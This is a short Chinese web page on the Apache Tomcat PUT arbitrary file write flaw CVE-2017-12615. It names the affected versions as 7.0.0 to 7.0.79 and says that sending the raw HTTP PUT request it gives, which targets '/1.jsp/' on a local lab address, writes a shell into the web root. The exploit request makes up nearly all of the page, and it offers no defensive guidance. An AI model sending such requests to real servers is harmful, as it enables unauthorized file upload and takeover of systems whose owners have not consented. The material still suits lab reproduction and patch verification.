
正文
Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)
提示:扫一扫查出行【扫一扫了解最新限行尾号】
复制提示
Apache Tomcat 7.0.0~7.0.79
直接发送以下数据包即可在Web根目录写入shell:
PUT /1.jsp/ HTTP/1.1
Host: 192.168.49.2:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
shell






